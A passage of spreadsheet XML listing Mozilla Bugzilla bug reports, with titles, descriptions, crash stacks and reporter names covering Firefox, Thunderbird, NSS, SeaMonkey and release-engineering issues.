https://preview.addons.mozilla.org/pl/firefox/addon/5579 should have text on it that starts with Lorem ipsum</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-226406</t>
  </si>
  <si>
    <t>[xft] instantiate unknown glyph (mini) font lazily</t>
  </si>
  <si>
    <t>Even after the checkin for bug 223813 we still spend a fair amount of time in
font matching (and it's not speedy so we should strive to do it as little as
possible). One thing I noticed is that we create mMiniFont up-front for a
nsFontXft even though very few pages need to draw an unknown glyph character. 
We're spending nearly as much time doing font matching for the mini font as for
the main font.  I think we should instantiate the mini font only as needed.
It's also worth noting that the mini fonts could be reused across nsFontXft
instances since the mini font depends only the size and weight of the primary
font not its family.  I think the lazy instantiation will be a bigger win for
now though since we need to draw unknown glyphs infrequently.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-998443</t>
  </si>
  <si>
    <t>delete build.mozilla.org cert and internal-facing HTTPS support</t>
  </si>
  <si>
    <t>C just brought this to my attention.
This cert expired in March intentionally.  Yet it's still used for two internal-facing vservers releng-https and releng-stage-https.  Both of these are hooked to pools that talk to port 83 and a grep of the releng webapp in puppet shows no  so I think it's completely unused.
I've enabled request logging for both vservers.  If there's no requests by Monday then these are safe to kill.</t>
  </si>
  <si>
    <t>CORE-530290</t>
  </si>
  <si>
    <t>Replace PR_MIN/PR_MAX with NS_MIN/NS_MAX in netwerk/</t>
  </si>
  <si>
    <t>NSS-178894</t>
  </si>
  <si>
    <t>Quick decoder updates for lib/certdb and lib/certhigh</t>
  </si>
  <si>
    <t>The use of SEC_ASN1Decode and SECASN1DecodeItem should be examined in lib/certdb
and lib/certhigh to see if we can use the quick decoder instead.</t>
  </si>
  <si>
    <t>CORE-349241</t>
  </si>
  <si>
    <t>PSM sets an exception but returns NS_OK</t>
  </si>
  <si>
    <t>In nsCrypto::SignText there is the following code:
   if (!aCaOption.EqualsLiteral(auto) &amp;&amp;
       !aCaOption.EqualsLiteral(ask)) {
     JS_ReportError(cx %s%s\n JS_ERROR caOption argument must be ask or auto)
     aResult.Append(internalError)
     return NS_OK
   }
When we unwind through XPConnect the NS_OK return value confuses us into thinking that no error was thrown and execution continues without actually throwing the exception. This also botches an assertion in the JS engine.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-124486</t>
  </si>
  <si>
    <t>Enable Outlook Express importing when OE is not in default location or not installed (select files/folders)</t>
  </si>
  <si>
    <t>The mail app can't find the Outlook Express address book when you try to import
it if the address book isn't in the default directory for that user. I keep my
address book and mail in a directory as far away from my C: drive as possible.
There's no place to tell Mozilla where to look for the address book and it never
found it. I had to open OE export it to a csv file and import it into Mozilla
from that.</t>
  </si>
  <si>
    <t>peartree01</t>
  </si>
  <si>
    <t>SEAMONKEY-189453</t>
  </si>
  <si>
    <t>Version reporting seems screwy. http://www.mozilla.org/start/ says I need to upgrade</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:0.9.4) Gecko/20011022 Netscape6/6.2
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:0.9.4) Gecko/20011022 Netscape6/6.2
I uninstalled mozilla then I installed 1.3a and when I went to
http://www.mozilla.org/start/ it says I have a security vulnerability and should
update to 1.3a
Reproducible: Always
Steps to Reproduce:
1. uninstall old mozilla
2. install 1.3a
3. go to http://www.mozilla.org/start/
Actual Results:  
page says I need to update to 1.3a
Expected Results:  
Say I have the latest version</t>
  </si>
  <si>
    <t>bandit_109</t>
  </si>
  <si>
    <t>CORE-322725</t>
  </si>
  <si>
    <t>Restore from bfcache crashes with non-HTML  [@ PresShell::EnumeratePlugins] [@ StartPluginInstance]</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20060103 Firefox/1.6a1
Steps to reproduce:
1. Load a testcase.
2. Load another page in the same tab (e.g. your home page).
3. Press Back.
Result: Crash.
Stack from a nightly build:
0    PresShell::Freeze() + 420
1    PresShell::EnumeratePlugins(nsIDOMDocument* nsString const&amp; void (*)(PresShell* nsIContent*)) + 236
2    PresShell::Thaw() + 132
3    nsDocShell::RestoreFromHistory() + 2744
4    nsDocShell::CaptureState() + 668
5    PL_HandleEvent + 36
6    PL_ProcessPendingEvents + 128
Security-sensitive due to suspicious stack -- how does PresShell::Freeze end up on the top of the stack?  PresShell::EnumeratePlugins only appears to call GetElementsByTagName and (through the callback) StartPluginInstance.
In a debug build there are two assertion failures and the stack makes more sense: StartPluginInstance is at the top and the rest is the same.
###!!! ASSERTION: Object nodes must implement nsIObjectLoadingContent: 'objlc' file /Users/admin/trunk/mozilla/layout/base/nsPresShell.cpp line 6234
Break: at file /Users/admin/trunk/mozilla/layout/base/nsPresShell.cpp line 6234
###!!! ASSERTION: You can't dereference a NULL nsCOMPtr with operator-&gt;().: 'mRawPtr != 0' file ../../dist/include/xpcom/nsCOMPtr.h line 849
Break: at file ../../dist/include/xpcom/nsCOMPtr.h line 849
I think the problem is that EnumeratePlugins assumes that anything with the tagname object that QI's to nsIContent is safe to pass to its callback but StartPluginInstance assumes that its argument can QI's to nsIObjectLoadingContent.  Possible fixes:
(A) Make EnumeratePlugins use GetElementsByTagNameNS so it only sees  not all  elements.
(B) Make StartPluginInstance test for nsIObjectLoadingContent instead of asserting and then crashing.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-206452</t>
  </si>
  <si>
    <t>DOM Node attribute modifications don't work</t>
  </si>
  <si>
    <t>Thanks to Neil for finding this</t>
  </si>
  <si>
    <t>CORE-273056</t>
  </si>
  <si>
    <t>PluginArrayImpl::GetLength should not throw if there's no plugin host and PluginArrayImpl::GetPlugins should handle no plugin host and failure from mPluginHost-&gt;GetPlugins</t>
  </si>
  <si>
    <t>Error: uncaught exception: [Exception... Component returned failure code:
0x80004005 (NS_ERROR_FAILURE) [nsIDOMPluginArray.length]  nsresult: 0x80004005
(NS_ERROR_FAILURE)  location: JS frame :: javascript: navigator.plugins.length
::  :: line 1  data: no]
Error: uncaught exception: [Exception... Failure  nsresult: 0x80004005
(NS_ERROR_FAILURE)  location: JS frame :: javascript: navigator.plugins[0] ::
 :: line 1  data: no]
Error: uncaught exception: [Exception... Failure  nsresult: 0x80004005
(NS_ERROR_FAILURE)  location: JS frame :: javascript: navigator.plugins.test
::  :: line 1  data: no]</t>
  </si>
  <si>
    <t>CORE-205730</t>
  </si>
  <si>
    <t>clean up unused code in parser</t>
  </si>
  <si>
    <t>There's some old cruft in htmlparser/ that I'd like to remove.</t>
  </si>
  <si>
    <t>CORE-460637</t>
  </si>
  <si>
    <t>[BC] ASSERTION: invalid BC damage area: 'PR_FALSE'</t>
  </si>
  <si>
    <t>Followup from bug 284852 (also bug 315549 is probably related):
  -------  Comment #3 From  Mats Palmgren   2005-03-05 15:41:25 PDT
Testcase #1 (attachment 176407)
Here are three different examples that leads to an assertion.
A bit of debug output on the first example at the top:
Clicking 5 times on the button...
Document file:///home/mats/work/bug284852/284852.html loaded successfully
ExpandWithCells aRowSpanIsZero=1 aColIndex=0 aRowSpan=2
  aRowSpanIsZero aMap.GetColCount()=1 endColIndex=0
  SetDamageArea x=0 y=3 width=1 height=-2
ExpandWithCells aRowSpanIsZero=1 aColIndex=0 aRowSpan=2
  aRowSpanIsZero aMap.GetColCount()=2 endColIndex=0
  SetDamageArea x=0 y=3 width=1 height=-1
ExpandWithCells aRowSpanIsZero=1 aColIndex=0 aRowSpan=2
  aRowSpanIsZero aMap.GetColCount()=3 endColIndex=0
  SetDamageArea x=0 y=3 width=1 height=0
ExpandWithCells aRowSpanIsZero=1 aColIndex=0 aRowSpan=2
  aRowSpanIsZero aMap.GetColCount()=4 endColIndex=0
  SetDamageArea x=0 y=3 width=1 height=1
ExpandWithCells aRowSpanIsZero=1 aColIndex=0 aRowSpan=2
  aRowSpanIsZero aMap.GetColCount()=5 endColIndex=0
  SetDamageArea x=0 y=3 width=1 height=2
###!!! ASSERTION: invalid BC damage area: 'PR_FALSE' file nsTableFrame.cpp
line 4569
Break: at file nsTableFrame.cpp line 4569
The damage area setup is wrong... the root of the problem IMO is the 'aRowSpan'
value (2) which is the result of:
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/layout/tables/nsCellMap.cpp&amp;rev=3.91&amp;root=/cvsroot&amp;mark=175217591760#1750
The problem also occurs for aRowSpanIsZero is false though -
see the second example.
The third is also a zero rowspan case although it triggers the assertion
at a different place nsTableFrame line 982:
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/layout/tables/nsTableFrame.cpp&amp;rev=3.610&amp;root=/cvsroot&amp;mark=967982#966</t>
  </si>
  <si>
    <t>BUGZILLA-364195</t>
  </si>
  <si>
    <t>No way to search for private comments</t>
  </si>
  <si>
    <t>There's an Attachment is private option but there's no Comment is private option meaning there's no way to search for private comments. :(</t>
  </si>
  <si>
    <t>CORE-348156</t>
  </si>
  <si>
    <t>nsDocument::Destroy needs to die</t>
  </si>
  <si>
    <t>We need to get rid of the hidiousness of nsDocument::Destroy. All sorts of code gets confused by the fact that we call UnbindFromTree on all the children of the document without neither sending out any nsIMutationObserver notifications or actually removing the nodes from the childlist of the document.
The attachment in bug 326645 comment 20 had to be backed out because the layout code tried to render the half-destroyed document. Bug 330302 has some analysis of what went on there.
Bug 348062 is another example where we end up crashing because we end up with dangling pointers in nsContentList.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-414622</t>
  </si>
  <si>
    <t>setup linux mobile builds</t>
  </si>
  <si>
    <t>CORE-453173</t>
  </si>
  <si>
    <t>TM: Crash [@ TraceRecorder::record_JSOP_ENDINIT] with []</t>
  </si>
  <si>
    <t>./js -j
js&gt; for(i=0i&lt;4++i) []
Crash [@ TraceRecorder::record_JSOP_ENDINIT]
Probably a regression from the megapatch on bug 452878.  This is the most frequent crash that jsfunfuzz hits.</t>
  </si>
  <si>
    <t>CORE-433030</t>
  </si>
  <si>
    <t>[Mac] desired character codes for DOM events with Cmd+Shift</t>
  </si>
  <si>
    <t>The code cleanup changes in attachment 320103 accidentally changed the
intended logic when CapsLock is on and Cmd and Shift are down and layout is
Latin.  (My bad.)
The intended logic could be restored easily but it seems the intended logic
may not be best.
The original intended logic (before the clean up) was designed due to a
situation seen on the German keyboard layout.
This layout has U+00DF ÃŸ (Eszett) and ? on one key.  The ? is accessed
with Shift.  However when Cmd+Shift are down the OS sends the character /.
The original intended logic was designed assuming that this was something
special and that the user might have meant a Cmd+/.  However / is
available as Shift+7 so I don't believe that the user ever would intend a
/ when typing Cmd+?.
It looks like the real reason for the OS providing Cmd+Shift+/ when the user
types Cmd+? (Cmd+Shift+ÃŸ) on a German layout is that on a US layout
Cmd+? looks like Cmd+Shift+/ and the OS may use Cmd+Shift+/ to detect
the help shortcut (Cmd+?).
So there are two (overlapping) issues here:
1. When the modifier state is CapsLock+Cmd+Shift the character code (from any
   Latin key) sent to javascript would be the character code that the OS sends
   with Cmd+Shift but the character code that we would like is the one that
   the keyboard produces with CapsLock+Shift.
2. When the modifier state is Cmd+Shift and the key (from any Latin or
   non-Latin key) is a key for which the OS-provided character with Cmd
   depends on the state of Shift the character sent to javascript is the
   character that the OS sends with Cmd+Shift but the character code that we
   would like is the one that the keyboard produces with only Shift.
   (Most often the OS-provided character with Cmd does not depend on the state
    of Shift but with German ÃŸ/? and other keys it does.)
(A fix for these issues has been posted in attachment 320198 but I'm filing a
 separate bug so that discussion of this issue is clearly separated.)</t>
  </si>
  <si>
    <t>CORE-270804</t>
  </si>
  <si>
    <t>relatively positioned does not take 100% width until clicked</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
The bug kinda looks like IE's peek-a-boo bug :
http://positioniseverything.net/explorer/peekaboo.html
If you check out http://www.schizofreend.nl/windowtest/ you'll see some of my
DHTML experiments. The bug is in the header part of the 'windows'. The titlebar
should as usual fill out over the entire width of the parent element but it
does not until clicked.
Please note that the entire site is built dynamically using javascripts.
Reproducible: Didn't try
Steps to Reproduce:
1.
2.
3.
Expected Results:  
The titlebar of each window should as usual fill out over the entire width of
the parent element but it does not until clicked.</t>
  </si>
  <si>
    <t>schizoduckie</t>
  </si>
  <si>
    <t>THUNDERBIRD-353205</t>
  </si>
  <si>
    <t>request way to set default to no alternate text for inserting images</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Currently if you want to insert an image you have to mouse down and click on don't use alternate text.  I've probably had to do this hundreds of times.  I asked in the forum about was there a way to set this as the default and all I got was nasty flack from someone carrying on about how I disliked blind people and what I wanted violated some standard.
All I'm saying is leave the initial default to requiring alternate text if you want but have a way for the rest of us to once only set the default to no alternate text.
Reproducible: Always</t>
  </si>
  <si>
    <t>jonathan.protzenko</t>
  </si>
  <si>
    <t>turningoff</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-428859</t>
  </si>
  <si>
    <t>Missing translations in Camino 1.6 German</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X it rv:1.8.1.13) Gecko/20080327 Camino/1.6b4 (like Firefox/2.0.0.13)
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X it rv:1.8.1.13) Gecko/20080327 Camino/1.6b4 (like Firefox/2.0.0.13)
The following files are not translated in the provided l10n:
- Frameworks/SharedMenuCocoa.framework//Resources/InfoPlist.strings
- MacOS/components/talkback/Talkback.app/Resources/Localizable.strings
- MacOS/plugins/Default Plugin.plugin/Resources/InfoPlist.strings
- MacOS/plugins/JavaEmbeddingPlugin.bundle/Resources/InfoPlist.strings
- MacOS/plugins/MRJPlugin.plugin/Resources/InfoPlist.strings
- Resources/FeedHandlers/BloglinesFeedHandler.app/Resources/InfoPlist.strings
- Resources/FeedHandlers/GoogleFeedHandler.app/Resources/InfoPlist.strings
- Resources/FeedHandlers/MyYahooFeedHandler.app/Resources/InfoPlist.strings
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-336684</t>
  </si>
  <si>
    <t>[FIX]Atomize strings if passed to an nsIAtom param.</t>
  </si>
  <si>
    <t>I have a fix for this... but I have no idea how to test it.  Can someone point me to a JS-exposed API that takes nsIAtom in params?</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-464415</t>
  </si>
  <si>
    <t>/college/ redirects to Jobvite home page</t>
  </si>
  <si>
    <t>http://www.mozilla.com/college/ incorrectly redirects to http://www.jobvite.com/Recruiting/Home.aspx
# Temporary rewrite for College page to JobVite page
Redirect temp /en-US/college http://www.jobvite.com/CompanyJobs/Jobs.aspx?c=qpX9Vfwa
This was added in r19443 apparently.
In the future I'd appreciate it if changes to .htaccess went through clouserw or me as it's really easy to mess stuff up in .htaccess.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-498982</t>
  </si>
  <si>
    <t>Update Extend Firefox Blog theme pages</t>
  </si>
  <si>
    <t>Created attachment 383777
Jetpack Logo
The current Extend Firefox blog has a section called Featured Project on the right column which is currently featuring Project Joey. It needs to be replaced with the Jetpack project. Here's the info:
1) Replace the image with the JP logo attached
2) Replace the label Project Joey with Project Jetpack
3) Replace the descriptive text with Jetpack is an API for allowing you to write Firefox add-ons using the web technologies you already know.
4) Point the Read More link to https://jetpack.mozillalabs.com/</t>
  </si>
  <si>
    <t>CORE-475343</t>
  </si>
  <si>
    <t>Region maintenance can get very expensive</t>
  </si>
  <si>
    <t>Quoting from email:
------------------------------------------------------------------------
It seems Firefox is unusually slow compared to Chrome on the following JavaScript Mandelbrot Set:
http://warp.povusers.org/MandScripts/javascript2.html (click on Proceed in the bottom)
The problem however is not in JavaScript component (less than 1% of the cycles is in js3250.dll). Following is the VTune data about retired instructions. A huge 80% of the total cycles is spent in gkgfx and 85% of gkgfx is in nsRegion.cpp. A lot of rectangle insertions deletions and traversals are happening.
------------------------------------------------------------------------
------------------------------------------------------------------------
It looks like we spend (on my hardware) about 1300ms getting to close().
Opera takes 1500 Safari 400.  After that though we have a
multi-second unresponsive hang which is presumably what Moh had profiled.
ccing roc and vlad since this stuff is their kettle of fish.
It looks like the images load one by one and invalidate their rects.
There are 10000 such rects of course.
So we basically end up under [ChildView drawRect:] called from NSView
code and from there spend our time in a 2-1 ratio under
nsViewManager::Refresh and nsThebesRegion::Union.  The latter is
certainly the building up of the region under drawRect.  The former is
largely the nsRegion::Or call from ConvertNativeRegionToAppRegionwith
some smattering of actually painting.  The time spent painting is almost
entirely under nsDisplaClip::OptimizeVisibility doing region operations.
In other words we spend more time sorting out the right region to paint
that it would take to just paint everything.
That reminds me strongly of bug 253001.  Would it make
sense to apply a similar approach here?  It looks like the opaque region
thing got backed out as part of the display list landing because all
that code went away.  But we should probably do it for both damage and
opaque regions.
------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>WEBSITES-604521</t>
  </si>
  <si>
    <t>[zh-TW] translate strings for the Firefox description on Android Marketplace</t>
  </si>
  <si>
    <t>We need 3 strings translated to propose Firefox on the Android market place.
Since these strings are not used on a mozilla site but on a partner application we have set up a new svn repository for those special projects.
The repository is:
https://svn.mozilla.org/projects/l10n-misc/trunk/
For this specific project the folder is androidmarket/YOURLOCALECODE/ example for Czech:
https://svn.mozilla.org/projects/l10n-misc/trunk/androidmarket/cs/
You will find in your locale folder a strings.php file with 3 php variables to translate ex:
http://viewvc.svn.mozilla.org/vc/projects/l10n-misc/trunk/androidmarket/en-US/strings.php?revision=75801&amp;view=co
There are limitations to the number of characters you can use:
$titleString : 30 characters
$description : 325 characters
$slogan : 80 characters
A small testing tool to check that what you submitted respect those length restrictions is located there (page updated from svn every 10mn):
http://l10n-misc.stage.mozilla.com/androidmarket/qa/
This is a short but rather urgent project since we want to submit Firefox Beta for mobile to the Android market place as soon as possible.
If you need help with the new repo please contact me on IRC. If I am not available you can ask Milos in the #l10n irc channel for help (Mozilla intern)
Thanks</t>
  </si>
  <si>
    <t>MOZILLA.ORG-386736</t>
  </si>
  <si>
    <t>CVS Write Access for ause</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.12) Gecko/20070301 SUSE/1.8_seamonkey_1.0.9-2.3 SeaMonkey/1.0.9
Build Identifier: 
i'd like to have cvs write access for calendar development.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>NSS-415469</t>
  </si>
  <si>
    <t>ssl.sh reports ulimit not found on Windows</t>
  </si>
  <si>
    <t>When I run the trunk version of ssl.sh on windows the first line of output
says:
&gt; ulimit: ssl.sh 915: not found
MKS on Windows doesn't have a ulimit command.  
The problem is the presence of this line in ssl.sh:
ssl/ssl.sh:832:    ulimit -n 1000 # make sure we have enough file descriptors
The checkin comment for the commit that added this line says:
&gt; 1.83  2007-07-26 15:15
&gt; Enable shared db tests to pass on solaris.
We probably should not attempt to run ulimit on Windows.</t>
  </si>
  <si>
    <t>CORE-389486</t>
  </si>
  <si>
    <t>Move pluginreg.dat to profile directory</t>
  </si>
  <si>
    <t>pluginreg.dat should be per profile in order to have enabled/disabled plugins be per profile. Corrupted pluginreg.dat files are also a source of problems so this makes using a new profile fix more problems than before.</t>
  </si>
  <si>
    <t>NSS-157730</t>
  </si>
  <si>
    <t>NSS crashes whenever it access certs on smartcard</t>
  </si>
  <si>
    <t>this works in Mozilla 1.0 RTM but reproducably fails in Mozilla 1.1a or 1.1b.
I can add the security module to the security device manager but going to a site
that uses cert-auth causes NSS to crash.  I'm attaching the kernel dump.</t>
  </si>
  <si>
    <t>CORE-346875</t>
  </si>
  <si>
    <t>Fix broken JS testcase code</t>
  </si>
  <si>
    <t>http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/js/tests/js1_7/iterable/basic-for-each.js&amp;rev=1.2&amp;mark=6875-78#65
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/js/tests/js1_7/iterable/basic-for-in.js&amp;rev=1.2&amp;mark=6875-78#65
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/js/tests/js1_7/iterable/basic-Iterator.js&amp;rev=1.1&amp;mark=8087-90#77
One or the other of these is wrong and needs to be fixed (probably along with the associated testing code).</t>
  </si>
  <si>
    <t>SEAMONKEY-121085</t>
  </si>
  <si>
    <t>[FIXr]Opening URL from separate bookmark windows by Enter key of keyboard opens a new window</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:0.9.7+)
Gecko/20020120
BuildID:    2002012008
Open a separate bookmark window from Bookmarks -&gt; Manage Bookmarks... and
choose some website with its entry in the separate bookmark window.
Now double click(I wish it's single click) it to open the actual
website view.
It spawns a new navigator window and the site you choosed to see is in it.
In Netscape 4 this doesn't spawn a new navigator window but just overwrite the
content of the navigator window which has window focus at that time.
I'm not sure it's a bug or by design but anyway I hope it'll be fixed.
If it's by design please change the design and make it spawn a new
tab in a focused navigator window instead of spawning a new navigator window.
Reproducible: Always
Steps to Reproduce:
1.Open a separate bookmark window from Bookmarks -&gt; Manage Bookmarks...
2.Choose some website with its entry in the separate bookmark window.
3.Double-click it
Actual Results:  It spawns a new navigator window for the selected website
Expected Results:  Overwrite the content of the navigator window which has
window focus at that time and displays the content of the selected website.</t>
  </si>
  <si>
    <t>klassphere</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-483198</t>
  </si>
  <si>
    <t>[de][website] Ãœbersetzung der neuen Download-Seite</t>
  </si>
  <si>
    <t>Es gibt eine neue Download-Seite die wir auch ins Deutsche Ã¼bersetzen sollten. Damit wÃ¤re die Chance noch mehr Beta-Tester zu erhalten wesentlich hÃ¶her.
Hier die letzte Version im Original:
http://viewvc.svn.mozilla.org/vc/projects/mozilla.com/trunk/fr/firefox/all-beta.html?view=markup
WÃ¤re schÃ¶n wenn sich jemand finden kÃ¶nnte.</t>
  </si>
  <si>
    <t>coce</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-492221</t>
  </si>
  <si>
    <t>SeaMonkey buildbots fail graph data upload for leak/bloat/codesigs</t>
  </si>
  <si>
    <t>I now have a linux-debug machine set up for SeaMonkey which performs the leak test steps defined in MercurialBuildFactory and this works fine - except for one thing: It can't upload graph data anywhere.
We need to figure out if/how that data can be uploaded to the Mozilla graph server and eventually get an account set up there or find a different solution to make those cycles go green - in the ideal case with having graphs up somewhere of course.
I was told on IRC that catlee and/or alice could possibly help there is that right?</t>
  </si>
  <si>
    <t>NSS-419763</t>
  </si>
  <si>
    <t>logger thread should be joined on exit</t>
  </si>
  <si>
    <t>Similar to 418360 we leave a thread running in selfserv before PR_Cleanup() is called. This can cause issues such as assertions. The fix is to start the thread as joinable and join it before PR_Cleanup.</t>
  </si>
  <si>
    <t>THUNDERBIRD-276906</t>
  </si>
  <si>
    <t>Remember the Last Selected Folder (on restart)</t>
  </si>
  <si>
    <t>Settings/Remember The Last Selected Message surely means that when you close TB
it should restart with the last mailbox open and message highlighted which in
my case it doesnt.</t>
  </si>
  <si>
    <t>alistair_george</t>
  </si>
  <si>
    <t>BUGZILLA-148488</t>
  </si>
  <si>
    <t>More HTML validation fixes</t>
  </si>
  <si>
    <t>The patch I'll attach fixes everything found by:
find . -iname '*.html.tmpl' | xargs gmuck --mode=HTML --nodeprecated --nomimetype
with one exception.
The exception is that the 'edit comment as text'  doesn't have a rows
attribute which is required. We set the size using a style attribute. Mozilla
seems to ignore the rows attribute but I need to check if that is guarenteed.
That page only wokrs in mozilla ATM so I'm not worried about other browsers.
The mimetype warnings are all on the fact that we use text/javascript instead of
application/x-javascript. Was this a deliberate decision made for old IE
versions or something? If not I'll fix those too.
This is for 2.18 not 2.16 although the account/email/confirm.html.tmpl part
() may need to go into 2.16 since I can imagine browsers
having issues with that.
Most of the fixes are obvious ( adding action attribute to s
and alt to  and so on). Those that aren't include:
global/useful-links.html.tmpl: gmuck warns about inconcistant quote style so I
changed these to use  instead of ' (they were  because of how we were quoting
for TT)
search/form.html.tmpl: gmuck picked up on:
[%# Note: the  tag is unclosed at the end of this template %]
as not having an action attribute. Since the opening isn't in this template and
only one template uses this particular template I think its a fairly silly
comment so I removed it. I care because I want gmuck to become part of the
tests - see bug 148487. I thought about reporting this as a gmuck bug but its
not since gmuck shouldn't be expected to know about TT's comment scheme.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-218998</t>
  </si>
  <si>
    <t>Username/Password prompts should specify News account name</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030624
There is a prompt that comes up and asks for the user name for the news server
since I have in the settings to check for news every so often. However I have
two news accounts that I have set up. The prompt window however does not specify
which account it is checking and therefore I don't know which username to give
it. I imagine there are other such prompts for password prompts and if they
behave this way they should also be fixed.
I am using: Mozilla Thunderbird 0.2 (20030901)
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>tironsi</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-335401</t>
  </si>
  <si>
    <t>Use a cert trust string other than CCC</t>
  </si>
  <si>
    <t>Now that bug 333767 has been fixed add support in the CCK to customize the trust string.
For now we will simply allow c and C.</t>
  </si>
  <si>
    <t>CORE-76522</t>
  </si>
  <si>
    <t>embedded window ownership models differ from Mozilla's</t>
  </si>
  <si>
    <t>Different platforms' WindowCreator::CreateChromeWindow have different ownership 
models on the returned nsIWebBrowserChrome object. In Mozilla the 
nsIWebBrowserChrome object is an nsContentTreeOwner an object owned by the 
nsXULWindow. The window is a strong owner so it returns from creation with a 
refcount of 2 (one from the factory one from the strong owner).
  winEmbed (as do all the embedding apps I'm pretty sure) implements the 
nsIWebBrowserChrome as a top-level window no one owns it. It returns from 
creation with a refcount of 1 from the factory. In WindowWatcher the two paths 
merge and the newly created window is either released prematurely or leaked 
depending on which ownership model WindowWatcher assumes.
  What am I supposed to say now that isn't all cursing?</t>
  </si>
  <si>
    <t>TOOLKIT-528445</t>
  </si>
  <si>
    <t>change app.update.log.* in updates.js to app.update.log for UI logging</t>
  </si>
  <si>
    <t>This was changed in Bug 311965</t>
  </si>
  <si>
    <t>CORE-481993</t>
  </si>
  <si>
    <t>Along with fileName &amp; lineNumber Error object should give Column Numbers.</t>
  </si>
  <si>
    <t>Error object gives fileName and lineNumber can we get also column numbers.
It will be nice to have as more and more sites are Minifying JavaScript.
And putting many things on same line.</t>
  </si>
  <si>
    <t>CORE-521495</t>
  </si>
  <si>
    <t>moz-icon:// protocol does not work with SVG icons</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 de rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 FirePHP/0.3
Build Identifier: Mozilla/5.0 (X11 U Linux i686 de rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 FirePHP/0.3
for the working mime types i tried the generic orange-gnome-foot-on-sheet-icon was shown for invalid names the foot was white.
Reproducible: Always
Steps to Reproduce:
enter url like moz-icon://.pdf?size=16
Actual Results:  
generic icon is shown on kde
Expected Results:  
compare with gnome or windows: pdf icon shows up.
simple pseudocode-patch:
mime = url.substring(firstIndexOf(.)+1 firstIndexOf(?)) + .png
size = url.parse(size)
if size &lt;= 16:
  sizestr = 16x16
else if size &lt;= 24: #kde uses 22Â² pixel icons windows 24Â² for the same purposes
  sizestr = 22x22
else if size &lt;= 32:
  .
  .
  .
  sizestr = 265x265
if desktop == kde:
  while line != [Icons]
    line = readline(~/.kde/share/config/kdeglobals)
  theme = readline(~/.kde/share/config/kdeglobals).substring(firstIndexOf(=))
  iconpath = /usr/share/icons/ + theme + sizestr + mimetypes + prefix + mime
i cheated: you have to try out every prefix (application-text-...) and use other sizes if one is not available but itâ€™s not complicated...</t>
  </si>
  <si>
    <t>flying-sheep</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-885441</t>
  </si>
  <si>
    <t>Please boot up install.relabs.releng.scl3.mozilla.com</t>
  </si>
  <si>
    <t>After installing Mountain Lion on this system the system can't boot for some reason. Could you please help boot the system and attach a spider kvm to it as well so we can see what's wrong with it? Thanks.</t>
  </si>
  <si>
    <t>shnguyen</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-266661</t>
  </si>
  <si>
    <t>Remove empty folders from archive.mozilla.org</t>
  </si>
  <si>
    <t>On archive.mozilla.org it seems there are many empty folders. This is confusing
for someone who wants to find a regression and only opens empty folders ).
Examples:
http://archive.mozilla.org/pub/mozilla/nightly/2004-07-27-09-trunk/
http://archive.mozilla.org/pub/mozilla/nightly/2004-08-15-07-trunk/
http://archive.mozilla.org/pub/mozilla/nightly/2004-08-15-08-trunk/
I would suggest
1.) to delete those empty directories (get a list of those with find . -type d
-empty -print and pass to rmdir).
2.) find out why these empty directories are created and eliminate the cause of
that.</t>
  </si>
  <si>
    <t>CORE-304891</t>
  </si>
  <si>
    <t>Using ctrl+right arrow in textarea first word after hard line break is skipped</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. In any textarea (such as the one on this page) type a few words then Enter
then a few more words.
2. Place the caret on the first line
3. Use ctrl+right arrow to move across words
4. after reaching the beginning of the last word on the first line hittingh
ctrl+right again skips the first word on the second line and places the caret
